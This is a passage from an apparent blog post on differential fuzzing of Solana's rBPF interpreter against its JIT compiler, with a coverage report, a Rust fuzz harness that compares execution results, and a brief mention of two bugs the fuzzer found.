  942|     26|                ebpf::ADD64_REG  => reg[dst] = reg[dst].wrapping_add(reg[src]),
  943|    145|                ebpf::SUB64_IMM  => reg[dst] = reg[dst].wrapping_sub(insn.imm as u64),
  944|     25|                ebpf::SUB64_REG  => reg[dst] = reg[dst].wrapping_sub(reg[src]),
  945|    480|                ebpf::MUL64_IMM  => reg[dst] = reg[dst].wrapping_mul(insn.imm as u64),
  946|     13|                ebpf::MUL64_REG  => reg[dst] = reg[dst].wrapping_mul(reg[src]),
  947|    191|                ebpf::DIV64_IMM  => reg[dst] /= insn.imm as u64,
  948|       |                ebpf::DIV64_REG  => {
  949|      5|                    if reg[src] == 0 {
  950|      3|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  951|      2|                    }
  952|      2|                                    reg[dst] /= reg[src];
  953|       |                },
  954|       |                ebpf::SDIV64_IMM  => {
  955|      0|                    if reg[dst] as i64 == i64::MIN && insn.imm == -1 {
  956|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  957|      0|                    }
  958|      0|
  959|      0|                    reg[dst] = (reg[dst] as i64 / insn.imm) as u64
  960|       |                }
  961|       |                ebpf::SDIV64_REG  => {
  962|      0|                    if reg[src] == 0 {
  963|      0|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  964|      0|                    }
  965|      0|                    if reg[dst] as i64 == i64::MIN && reg[src] as i64 == -1 {
  966|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  967|      0|                    }
  968|      0|                    reg[dst] = (reg[dst] as i64 / reg[src] as i64) as u64;
  969|       |                },
  970|    115|                ebpf::OR64_IMM   => reg[dst] |=  insn.imm as u64,
  971|     19|                ebpf::OR64_REG   => reg[dst] |=  reg[src],
  972|     93|                ebpf::AND64_IMM  => reg[dst] &=  insn.imm as u64,
  973|     19|                ebpf::AND64_REG  => reg[dst] &=  reg[src],
  974|     19|                ebpf::LSH64_IMM  => reg[dst] = reg[dst].wrapping_shl(insn.imm as u32),
  975|     48|                ebpf::LSH64_REG  => reg[dst] = reg[dst].wrapping_shl(reg[src] as u32),
  976|      4|                ebpf::RSH64_IMM  => reg[dst] = reg[dst].wrapping_shr(insn.imm as u32),
  977|      5|                ebpf::RSH64_REG  => reg[dst] = reg[dst].wrapping_shr(reg[src] as u32),
  978|     94|                ebpf::NEG64      => reg[dst] = (reg[dst] as i64).wrapping_neg() as u64,
  979|    141|                ebpf::MOD64_IMM  => reg[dst] %= insn.imm  as u64,
  980|       |                ebpf::MOD64_REG  => {
  981|     19|                    if reg[src] == 0 {
  982|      4|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  983|     15|                    }
  984|     15|                                    reg[dst] %= reg[src];
  985|       |                },
  986|     98|                ebpf::XOR64_IMM  => reg[dst] ^= insn.imm as u64,
  987|     17|                ebpf::XOR64_REG  => reg[dst] ^= reg[src],
  988|     89|                ebpf::MOV64_IMM  => reg[dst] =  insn.imm as u64,
  989|     10|                ebpf::MOV64_REG  => reg[dst] =  reg[src],
  990|     14|                ebpf::ARSH64_IMM => reg[dst] = (reg[dst] as i64).wrapping_shr(insn.imm as u32) as u64,
  991|    294|                ebpf::ARSH64_REG => reg[dst] = (reg[dst] as i64).wrapping_shr(reg[src] as u32) as u64,
  992|       |
  993|       |                // BPF_JMP class
  994|   327k|                ebpf::JA         =>                                          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
  995|    116|                ebpf::JEQ_IMM    => if  reg[dst] == insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^76                                                           ^40
  996|   131k|                ebpf::JEQ_REG    => if  reg[dst] == reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^11
  997|   163k|                ebpf::JGT_IMM    => if  reg[dst] >  insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^147k                                                         ^16.4k
  998|   131k|                ebpf::JGT_REG    => if  reg[dst] >  reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^34
  999|  65.5k|                ebpf::JGE_IMM    => if  reg[dst] >= insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^8
 1000|  65.5k|                ebpf::JGE_REG    => if  reg[dst] >= reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^11
 1001|  65.5k|                ebpf::JLT_IMM    => if  reg[dst] <  insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^3
 1002|      6|                ebpf::JLT_REG    => if  reg[dst] <  reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^4                                                            ^2
 1003|   131k|                ebpf::JLE_IMM    => if  reg[dst] <= insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^2
 1004|  65.5k|                ebpf::JLE_REG    => if  reg[dst] <= reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^2
 1005|      3|                ebpf::JSET_IMM   => if  reg[dst] &  insn.imm as u64 != 0     { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1                                                            ^2
 1006|      2|                ebpf::JSET_REG   => if  reg[dst] &  reg[src]        != 0     { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1007|   196k|                ebpf::JNE_IMM    => if  reg[dst] != insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^196k                                                         ^3
 1008|   131k|                ebpf::JNE_REG    => if  reg[dst] != reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^3
 1009|  65.5k|                ebpf::JSGT_IMM   => if  reg[dst] as i64 >   insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^6
 1010|     14|                ebpf::JSGT_REG   => if  reg[dst] as i64 >   reg[src]  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1                                                            ^13
 1011|  65.5k|                ebpf::JSGE_IMM   => if  reg[dst] as i64 >=  insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^12
 1012|  65.5k|                ebpf::JSGE_REG   => if  reg[dst] as i64 >=  reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^4
 1013|   131k|                ebpf::JSLT_IMM   => if (reg[dst] as i64) <  insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^20
 1014|   147k|                ebpf::JSLT_REG   => if (reg[dst] as i64) <  reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^147k                                                         ^23
 1015|  65.5k|                ebpf::JSLE_IMM   => if (reg[dst] as i64) <= insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^4
 1016|   131k|                ebpf::JSLE_REG   => if (reg[dst] as i64) <= reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^2
 1017|       |
 1018|       |                ebpf::CALL_REG   => {
 1019|      0|                    let target_address = reg[insn.imm as usize];
 1020|      0|                    reg[ebpf::FRAME_PTR_REG] =
 1021|      0|                        self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1022|      0|                    if target_address < self.program_vm_addr {
 1023|      0|                        return Err(EbpfError::CallOutsideTextSegment(pc + ebpf::ELF_INSN_DUMP_OFFSET, target_address / ebpf::INSN_SIZE as u64 * ebpf::INSN_SIZE as u64));
 1024|      0|                    }
 1025|      0|                    next_pc = self.check_pc(pc, (target_address - self.program_vm_addr) as usize / ebpf::INSN_SIZE)?;
 1026|       |                },
 1027|       |
 1028|       |                // Do not delegate the check to the verifier, since registered functions can be
 1029|       |                // changed after the program has been verified.
 1030|       |                ebpf::CALL_IMM => {
 1031|     17|                    let mut resolved = false;
 1032|     17|                    let (syscalls, calls) = if config.static_syscalls {
 1033|     17|                        (insn.src == 0, insn.src != 0)
 1034|       |                    } else {
 1035|      0|                        (true, true)
 1036|       |                    };
 1037|       |
 1038|     17|                    if syscalls {
 1039|      6|                        if let Some(syscall) = self.executable.get_syscall_registry().lookup_syscall(insn.imm as u32) {
                                                  ^0
 1040|      0|                            resolved = true;
 1041|      0|
 1042|      0|                            if config.enable_instruction_meter {
 1043|      0|                                let _ = instruction_meter.consume(*last_insn_count);
 1044|      0|                            }
 1045|      0|                            *last_insn_count = 0;
 1046|      0|                            let mut result: ProgramResult<E> = Ok(0);
 1047|      0|                            (unsafe { std::mem::transmute::<u64, SyscallFunction::<E, *mut u8>>(syscall.function) })(
 1048|      0|                                self.syscall_context_objects[SYSCALL_CONTEXT_OBJECTS_OFFSET + syscall.context_object_slot],
 1049|      0|                                reg[1],
 1050|      0|                                reg[2],
 1051|      0|                                reg[3],
 1052|      0|                                reg[4],
 1053|      0|                                reg[5],
 1054|      0|                                &self.memory_mapping,
 1055|      0|                                &mut result,
 1056|      0|                            );
 1057|      0|                            reg[0] = result?;
 1058|      0|                            if config.enable_instruction_meter {
 1059|      0|                                remaining_insn_count = instruction_meter.get_remaining();
 1060|      0|                            }
 1061|      6|                        }
 1062|     11|                    }
 1063|       |
 1064|     17|                    if calls {
 1065|     11|                        if let Some(target_pc) = self.executable.lookup_bpf_function(insn.imm as u32) {
                                                  ^0
 1066|      0|                            resolved = true;
 1067|       |
 1068|       |                            // make BPF to BPF call
 1069|      0|                            reg[ebpf::FRAME_PTR_REG] =
 1070|      0|                                self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1071|      0|                            next_pc = self.check_pc(pc, target_pc)?;
 1072|     11|                        }
 1073|      6|                    }
 1074|       |
 1075|     17|                    if !resolved {
 1076|     17|                        if config.disable_unresolved_symbols_at_runtime {
 1077|      6|                            return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 1078|       |                        } else {
 1079|     11|                            self.executable.report_unresolved_symbol(pc)?;
 1080|       |                        }
 1081|      0|                    }
 1082|       |                }
 1083|       |
 1084|       |                ebpf::EXIT => {
 1085|     39|                    match self.stack.pop::<E>() {
 1086|      0|                        Ok((saved_reg, frame_ptr, ptr)) => {
 1087|      0|                            // Return from BPF to BPF call
 1088|      0|                            reg[ebpf::FIRST_SCRATCH_REG
 1089|      0|                                ..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS]
 1090|      0|                                .copy_from_slice(&saved_reg);
 1091|      0|                            reg[ebpf::FRAME_PTR_REG] = frame_ptr;
 1092|      0|                            next_pc = self.check_pc(pc, ptr)?;
 1093|       |                        }
 1094|       |                        _ => {
 1095|     39|                            return Ok(reg[0]);
 1096|       |                        }
 1097|       |                    }
 1098|       |                }
 1099|      0|                _ => return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET)),
 1100|       |            }
 1101|       |
 1102|  2.16M|            if config.enable_instruction_meter && *last_insn_count >= remaining_insn_count {
 1103|       |                // Use `pc + instruction_width` instead of `next_pc` here because jumps and calls don't continue at the end of this instruction
 1104|     33|                return Err(EbpfError::ExceededMaxInstructions(pc + instruction_width + ebpf::ELF_INSN_DUMP_OFFSET, initial_insn_count));
 1105|  2.16M|            }
 1106|       |        }
 1107|       |
 1108|    683|        Err(EbpfError::ExecutionOverrun(
 1109|    683|            next_pc + ebpf::ELF_INSN_DUMP_OFFSET,
 1110|    683|        ))
 1111|    886|    }

Now we see that jump and call instructions are actually used, and that the body of the interpreter loop executes significantly more often despite approximately the same number of successful calls to the interpreter function. From this, we can infer that not only are more programs executed successfully, but also that the programs which do execute tend to run more valid instructions overall.

While this isn’t hitting every branch, it’s now hitting significantly more – and with much more interesting values.

The development of this version of the fuzzer took about an hour, so we’re at a total of two hours of development.

JIT and differential fuzzing

Now that we have a fuzzer which can generate lots of inputs that are actually interesting to us, we can develop a fuzzer which can test both JIT and the interpreter against each other. But how do we even test them against each other?

Picking inputs, outputs, and configuration

As the definition of a pseudo-oracle says, we need to check whether the alternate program (for JIT, the interpreter, and vice versa), when provided with the same “input”, provides the same “output”. So what inputs and outputs do we have?

For inputs, there are three notable things we’ll want to vary:

The config which determines how the VM should execute (what features and such)
The BPF program to be executed, which we’ll generate like we do in “smart”
The initial memory of the VMs

Once we’ve developed our inputs, we’ll also need to think of our outputs:

The “return state”, the exit code itself or the error state
The number of instructions executed (e.g., did the JIT program overrun?)
The final memory of the VMs
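
One way to make these three outputs comparable is to bundle them into a single value. The sketch below is illustrative only: `Observation` and `first_mismatch` are hypothetical names, and using a `String` for the error state is an assumption made for brevity; none of this is part of rBPF. It checks the return state first, and only looks at the instruction budget and the memory when execution succeeded.

```rust
/// Everything we observe about one execution of a program.
/// (Hypothetical type for illustration; rBPF does not define it.)
#[derive(Debug, Clone, PartialEq)]
struct Observation {
    /// Exit code on success, or a description of the error state.
    result: Result<u64, String>,
    /// Instructions left in the budget when execution stopped.
    remaining: u64,
    /// Contents of the VM's input memory after execution.
    memory: Vec<u8>,
}

/// Returns a description of the first difference, or `None` if the two agree.
fn first_mismatch(expected: &Observation, actual: &Observation) -> Option<String> {
    if expected.result != actual.result {
        return Some(format!(
            "result: expected {:?}, got {:?}",
            expected.result, actual.result
        ));
    }
    // In this sketch, the remaining outputs are only compared after a
    // successful run; once both sides report the same error we stop here.
    if expected.result.is_ok() {
        if expected.remaining != actual.remaining {
            return Some(format!(
                "remaining: expected {}, got {}",
                expected.remaining, actual.remaining
            ));
        }
        if expected.memory != actual.memory {
            return Some(format!(
                "memory: expected {:?}, got {:?}",
                expected.memory, actual.memory
            ));
        }
    }
    None
}
```

A harness built this way would panic whenever `first_mismatch` returns `Some`, which is what turns a silent disagreement into a crash the fuzzer can report.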

Then, to execute both JIT and the interpreter, we’ll take the following steps:

The same steps as the first fuzzers:
- Use the rBPF verification pass (called “check”) to make sure that the VM will accept the input program
- Initialise the memory, the syscalls, and the entrypoint
- Create the executable data
Then prepare to perform the differential testing
- JIT compile the BPF code (if it fails, fail quietly)
- Initialise the interpreted VM
- Initialise the JIT VM
- Execute both the interpreted and JIT VMs
- Compare return state, instructions executed, and final memory, and panic if any do not match.
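
To make the shape of these steps concrete without pulling in rBPF, here is a minimal, self-contained sketch of differential testing on a toy machine. Everything in it is an assumption made for illustration: the `Insn` instruction set, the `VmError` variants, and the two runners are hypothetical, and the "optimised" runner (which merges adjacent additions before executing) merely stands in for the JIT. Because that merging changes how many instructions run, this sketch compares only the return state and the final memory, not the instruction count.

```rust
/// A toy instruction set (hypothetical; far smaller than eBPF).
#[derive(Debug, Clone, Copy)]
enum Insn {
    AddImm(u64),
    DivImm(u64),
    Store(usize), // write the low byte of the accumulator to mem[index]
    Exit,
}

#[derive(Debug, PartialEq)]
enum VmError {
    DivideByZero,
    OutOfBounds,
    Overrun, // ran off the end of the program without an Exit
}

/// Return state plus final memory: the outputs we compare.
type Outcome = (Result<u64, VmError>, Vec<u8>);

/// Reference implementation: execute the instructions one at a time.
fn run_interpreted(prog: &[Insn], mut mem: Vec<u8>) -> Outcome {
    let mut acc: u64 = 0;
    for insn in prog {
        match *insn {
            Insn::AddImm(v) => acc = acc.wrapping_add(v),
            Insn::DivImm(0) => return (Err(VmError::DivideByZero), mem),
            Insn::DivImm(v) => acc /= v,
            Insn::Store(i) => {
                if i >= mem.len() {
                    return (Err(VmError::OutOfBounds), mem);
                }
                mem[i] = acc as u8;
            }
            Insn::Exit => return (Ok(acc), mem),
        }
    }
    (Err(VmError::Overrun), mem)
}

/// Stand-in for the JIT: merge runs of `AddImm`, then execute the result.
fn run_optimised(prog: &[Insn], mem: Vec<u8>) -> Outcome {
    let mut folded: Vec<Insn> = Vec::new();
    for &insn in prog {
        let merged = match (folded.last().copied(), insn) {
            (Some(Insn::AddImm(a)), Insn::AddImm(b)) => Some(Insn::AddImm(a.wrapping_add(b))),
            _ => None,
        };
        match merged {
            Some(m) => {
                let last = folded.len() - 1;
                folded[last] = m;
            }
            None => folded.push(insn),
        }
    }
    run_interpreted(&folded, mem)
}

/// Run both implementations on identical inputs and report any disagreement.
fn differential(prog: &[Insn], mem: &[u8]) -> Result<(), String> {
    let expected = run_interpreted(prog, mem.to_vec());
    let actual = run_optimised(prog, mem.to_vec());
    if expected == actual {
        Ok(())
    } else {
        Err(format!("expected {:?}, but got {:?}", expected, actual))
    }
}
```

In a fuzz target, an `Err` from `differential` would become a panic. Note that each runner gets its own copy of the initial memory, so that a write by one implementation cannot mask a missing write by the other.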

Writing the fuzzer

As before, I’ve split this up into more manageable chunks so you can read them one at a time before seeing how they fit together in the final fuzzer.

Step 1: Defining our inputs

#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    ... snip ...
    prog: FuzzProgram,
    mem: Vec<u8>,
}
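
The `arbitrary::Arbitrary` derive is what lets the fuzzer's raw bytes arrive in the harness as a structured `FuzzData` value. As a rough, dependency-free illustration of that idea (and not a description of how the `arbitrary` crate is actually implemented), the sketch below decodes a byte slice into a hypothetical `ToyInput`. The type, its fields, and the byte layout are all assumptions made for this example.

```rust
/// Hypothetical structured input; this is not the `FuzzData` used by the fuzzer.
#[derive(Debug, PartialEq)]
struct ToyInput {
    enable_meter: bool,
    imm: i16,
    mem: Vec<u8>,
}

/// Decode raw fuzzer bytes into a `ToyInput`.
/// Returns `None` when there are too few bytes for the fixed-size fields.
fn decode(bytes: &[u8]) -> Option<ToyInput> {
    // First byte: a flag, of which only the lowest bit is used.
    let (&flag, rest) = bytes.split_first()?;
    // Next two bytes: a little-endian signed immediate.
    if rest.len() < 2 {
        return None;
    }
    let (imm_bytes, mem) = rest.split_at(2);
    Some(ToyInput {
        enable_meter: (flag & 1) == 1,
        imm: i16::from_le_bytes([imm_bytes[0], imm_bytes[1]]),
        // Whatever is left becomes the initial memory.
        mem: mem.to_vec(),
    })
}
```

The property worth noticing is that every sufficiently long byte string decodes to some well-formed input, so the fuzzer's byte-level mutations always translate into changes to a config bit, an immediate, or the memory rather than into parse errors.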

Step 2: Setting up the VM

fuzz_target!(|data: FuzzData| {
    let mut prog = make_program(&data.prog, Arch::X64);
    ... snip ...
    let config = data.template.into();
    if check(prog.into_bytes(), &config).is_err() {
        // verify please
        return;
    }
    let mut interp_mem = data.mem.clone();
    let mut jit_mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        prog.into_bytes(),
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    if Executable::jit_compile(&mut executable).is_ok() {
        let interp_mem_region = MemoryRegion::new_writable(&mut interp_mem, ebpf::MM_INPUT_START);
        let mut interp_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![interp_mem_region])
                .unwrap();
        let jit_mem_region = MemoryRegion::new_writable(&mut jit_mem, ebpf::MM_INPUT_START);
        let mut jit_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![jit_mem_region])
                .unwrap();

        // See step 3
    }
});

Step 3: Executing our input and comparing output

fuzz_target!(|data: FuzzData| {
    // see step 2

    if Executable::jit_compile(&mut executable).is_ok() {
        // see step 2

        let mut interp_meter = TestInstructionMeter { remaining: 1 << 16 };
        let interp_res = interp_vm.execute_program_interpreted(&mut interp_meter);
        let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };
        let jit_res = jit_vm.execute_program_jit(&mut jit_meter);
        if interp_res != jit_res {
            panic!("Expected {:?}, but got {:?}", interp_res, jit_res);
        }
        if interp_res.is_ok() {
            // we know jit res must be ok if interp res is by this point
            if interp_meter.remaining != jit_meter.remaining {
                panic!(
                    "Expected {} insts remaining, but got {}",
                    interp_meter.remaining, jit_meter.remaining
                );
            }
            if interp_mem != jit_mem {
                panic!(
                    "Expected different memory. From interpreter: {:?}\nFrom JIT: {:?}",
                    interp_mem, jit_mem
                );
            }
        }
    }
});

Step 4: Put it together

Below is the final code for the fuzzer, including all of the bits I didn’t show above for concision.

#![no_main]

use std::collections::BTreeMap;

use libfuzzer_sys::fuzz_target;

use grammar_aware::*;
use solana_rbpf::{
    ebpf,
    elf::{register_bpf_function, Executable},
    insn_builder::{Arch, Instruction, IntoBytes},
    memory_region::MemoryRegion,
    user_error::UserError,
    verifier::check,
    vm::{EbpfVm, SyscallRegistry, TestInstructionMeter},
};

use crate::common::ConfigTemplate;

mod common;
mod grammar_aware;

#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    exit_dst: u8,
    exit_src: u8,
    exit_off: i16,
    exit_imm: i64,
    prog: FuzzProgram,
    mem: Vec<u8>,
}

fuzz_target!(|data: FuzzData| {
    let mut prog = make_program(&data.prog, Arch::X64);
    prog.exit()
        .set_dst(data.exit_dst)
        .set_src(data.exit_src)
        .set_off(data.exit_off)
        .set_imm(data.exit_imm)
        .push();
    let config = data.template.into();
    if check(prog.into_bytes(), &config).is_err() {
        // verify please
        return;
    }
    let mut interp_mem = data.mem.clone();
    let mut jit_mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        prog.into_bytes(),
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    if Executable::jit_compile(&mut executable).is_ok() {
        let interp_mem_region = MemoryRegion::new_writable(&mut interp_mem, ebpf::MM_INPUT_START);
        let mut interp_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![interp_mem_region])
                .unwrap();
        let jit_mem_region = MemoryRegion::new_writable(&mut jit_mem, ebpf::MM_INPUT_START);
        let mut jit_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![jit_mem_region])
                .unwrap();

        let mut interp_meter = TestInstructionMeter { remaining: 1 << 16 };
        let interp_res = interp_vm.execute_program_interpreted(&mut interp_meter);
        let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };
        let jit_res = jit_vm.execute_program_jit(&mut jit_meter);
        if interp_res != jit_res {
            panic!("Expected {:?}, but got {:?}", interp_res, jit_res);
        }
        if interp_res.is_ok() {
            // we know jit res must be ok if interp res is by this point
            if interp_meter.remaining != jit_meter.remaining {
                panic!(
                    "Expected {} insts remaining, but got {}",
                    interp_meter.remaining, jit_meter.remaining
                );
            }
            if interp_mem != jit_mem {
                panic!(
                    "Expected different memory. From interpreter: {:?}\nFrom JIT: {:?}",
                    interp_mem, jit_mem
                );
            }
        }
    }
});

Theoretically, an up-to-date version is available in the rBPF repo.

And, with that, we have our fuzzer! This part of the fuzzer took approximately three hours to implement (largely due to finding several issues with the fuzzer and debugging them along the way).

At this point, we were about six hours in. I turned on the fuzzer and waited:

$ cargo +nightly fuzz run smart-jit-diff --jobs 4 -- -ignore_crashes=1

And the crashes began. Two main bugs appeared:

A panic when there was an error in the interpreter, but not in JIT, when writing to a particular address (crash in 15 minutes)
An AddressSanitizer crash from a memory leak when an error occurred just after the instruction limit was passed by the JIT’d program (crash in two hours)

To read the details of these bugs, continue to Part 2.